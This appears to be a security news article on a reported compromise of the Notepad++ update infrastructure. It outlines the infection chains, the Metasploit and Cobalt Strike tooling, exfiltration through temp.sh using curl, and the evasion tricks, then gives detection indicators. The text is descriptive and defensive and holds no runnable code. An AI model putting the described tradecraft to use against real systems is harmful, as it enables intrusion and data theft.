The implicit trust users place in automatic software updates was profoundly shaken when developers of the popular text editor Notepad++ disclosed a critical security breach affecting their update infrastructure on February 2, 2026. This incident highlights a growing and dangerous trend where threat actors target the software supply chain to distribute malware to unsuspecting users. According to the official statement from the developers, the widely used application became the vector for a sophisticated attack campaign that went undetected for months. The initial compromise occurred at the hosting provider level between June and September 2025, granting attackers persistent access to internal services through December of that year. This extended period of unauthorized access allowed the threat actors to meticulously plan and execute their operation, turning a routine software update into a targeted malware delivery mechanism. The breach serves as a stark reminder that even trusted and reputable software can be subverted, forcing both developers and end-users to reconsider their security posture and the inherent risks of automated software distribution channels.
1. Anatomy of a Sophisticated Campaign
The attack demonstrated an exceptional level of operational sophistication and careful planning, distinguishing it from more common, widespread malware campaigns. Threat actors maintained a dynamic and evolving attack infrastructure over a four-month period, from July to October 2025, continuously rotating their command and control server addresses, downloader components, and final malicious payloads. This constant modification made the campaign a moving target, significantly complicating efforts for security teams to detect, analyze, and neutralize the threat. Rather than a broad-spectrum attack, the operation was highly targeted, affecting only about a dozen machines belonging to specific individuals and organizations. The victims were geographically dispersed, with confirmed targets located in Vietnam, El Salvador, and Australia. The list of compromised entities also included organizations in the Philippines and a specific IT service provider based in Vietnam, suggesting a focused espionage or reconnaissance objective rather than a motive of widespread disruption or financial gain. This surgical precision indicates that the attackers had clear goals and likely conducted prior intelligence gathering to identify their targets.
During their investigation, security analysts from Securelist successfully identified and dissected three distinct infection chains, each employing unique technical characteristics and advanced evasion techniques. This multi-pronged approach further illustrates the attackers’ resourcefulness and determination to remain undetected. The threat actors leveraged a diverse toolkit that included well-known offensive security frameworks such as Metasploit for initial downloaders and Cobalt Strike Beacon for post-exploitation activities, allowing them to maintain control over compromised systems. In the later stages of the campaign, the attackers deployed a custom backdoor known as Chrysalis, indicating a higher level of capability and a desire to use proprietary tools that are less likely to be flagged by standard security solutions. Despite the complexity and variety of malicious payloads observed throughout the campaign, Kaspersky’s security products were reportedly successful in blocking the identified attacks as they occurred, preventing the final objectives of the threat actors from being fully realized on protected systems.
2. Technical Breakdown and Evasion Tactics
The first observable infection chain was initiated in late July 2025, when attackers began distributing a malicious NSIS installer through the compromised Notepad++ update infrastructure. When the legitimate Notepad++.exe updater process executed the malicious update.exe file, the payload immediately began conducting system reconnaissance. It sent a comprehensive profile of the victim’s machine to attacker-controlled servers, using the temp.sh file hosting service as an exfiltration channel. This initial data gathering was thorough, with the malware executing a series of shell commands to collect the current username, a list of running processes, detailed system information, and active network connections. The results of these commands were then carefully packaged and uploaded using crafted curl commands, providing the attackers with critical intelligence to determine if the compromised machine was a target of interest and how to proceed with the next phase of the attack. This automated reconnaissance phase was crucial for the attackers to filter out non-essential victims and focus their efforts exclusively on their intended targets without raising unnecessary alarms.
In a clever move to bypass modern security defenses, the attackers deliberately avoided the commonly used DLL sideloading technique, which is heavily monitored by many endpoint detection and response systems. Instead, they exploited an older, more obscure vulnerability in ProShow software that dates back to the early 2010s. This unconventional approach helped them evade detection systems that are primarily tuned to identify newer and more prevalent attack vectors. The exploit payload was ingeniously crafted with two distinct shellcodes. The first shellcode served merely as padding, designed to confuse and thwart automated analysis and sandboxing environments. The second, operative shellcode was responsible for decrypting a Metasploit downloader. This downloader then retrieved the final Cobalt Strike Beacon shellcode from remote servers, establishing a persistent and powerful backdoor on the victim’s system. This multi-stage, layered exploitation process showcased the attackers’ deep technical expertise and their commitment to remaining hidden while achieving their objectives within the targeted networks.
3. Detection and Mitigation Strategies
Security teams were able to identify this threat by monitoring for specific artifacts and behaviors associated with the malicious NSIS installer. A primary indicator of compromise that was identified was the creation of the %localappdata%Tempns.tmp directory, a signature behavior of the NSIS installer deployment. In addition, network traffic analysis proved crucial; organizations were advised to inspect for any unusual DNS resolutions to the temp.sh domain, which the attackers used for data exfiltration. System logs also provided vital clues, as security teams could search for the execution of reconnaissance commands such as whoami, tasklist, systeminfo, and netstat originating from unexpected processes. By correlating these indicators, defenders could piece together the attack chain and identify compromised systems. Further layers of defense were established through the implementation of behavioral detection rules designed to flag unauthorized modifications to registry autorun keys, a common persistence mechanism. Monitoring for suspicious connections to Living-Off-the-Land C2 services also provided an effective method for detecting the ongoing communication between the malware and its controllers, ultimately helping to contain the impact of this sophisticated supply chain compromise.